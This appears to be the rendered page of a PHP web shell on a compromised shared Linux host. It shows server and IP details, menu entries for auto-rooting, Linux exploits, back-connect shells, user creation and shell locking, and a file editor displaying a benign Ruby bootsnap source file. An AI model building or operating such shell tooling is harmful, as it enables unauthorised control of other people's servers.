Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
vendor_ruby /
bootsnap /
[ HOME SHELL ]
Name
Size
Permission
Action
cli
[ DIR ]
drwxr-xr-x
compile_cache
[ DIR ]
drwxr-xr-x
load_path_cache
[ DIR ]
drwxr-xr-x
bundler.rb
282
B
-rw-r--r--
cli.rb
7.82
KB
-rw-r--r--
compile_cache.rb
1.66
KB
-rw-r--r--
explicit_require.rb
1.45
KB
-rw-r--r--
load_path_cache.rb
2.1
KB
-rw-r--r--
setup.rb
86
B
-rw-r--r--
version.rb
70
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : compile_cache.rb
# frozen_string_literal: true module Bootsnap module CompileCache Error = Class.new(StandardError) PermissionError = Class.new(Error) def self.setup(cache_dir:, iseq:, yaml:, json:) if iseq if supported? require_relative('compile_cache/iseq') Bootsnap::CompileCache::ISeq.install!(cache_dir) elsif $VERBOSE warn("[bootsnap/setup] bytecode caching is not supported on this implementation of Ruby") end end if yaml if supported? require_relative('compile_cache/yaml') Bootsnap::CompileCache::YAML.install!(cache_dir) elsif $VERBOSE warn("[bootsnap/setup] YAML parsing caching is not supported on this implementation of Ruby") end end if json if supported? require_relative('compile_cache/json') Bootsnap::CompileCache::JSON.install!(cache_dir) elsif $VERBOSE warn("[bootsnap/setup] JSON parsing caching is not supported on this implementation of Ruby") end end end def self.permission_error(path) cpath = Bootsnap::CompileCache::ISeq.cache_dir raise( PermissionError, "bootsnap doesn't have permission to write cache entries in '#{cpath}' " \ "(or, less likely, doesn't have permission to read '#{path}')", ) end def self.supported? # only enable on 'ruby' (MRI), POSIX (darwin, linux, *bsd), Windows (RubyInstaller2) and >= 2.3.0 RUBY_ENGINE == 'ruby' && RUBY_PLATFORM =~ /darwin|linux|bsd|mswin|mingw|cygwin/ && Gem::Version.new(RUBY_VERSION) >= Gem::Version.new("2.3.0") end end end
Close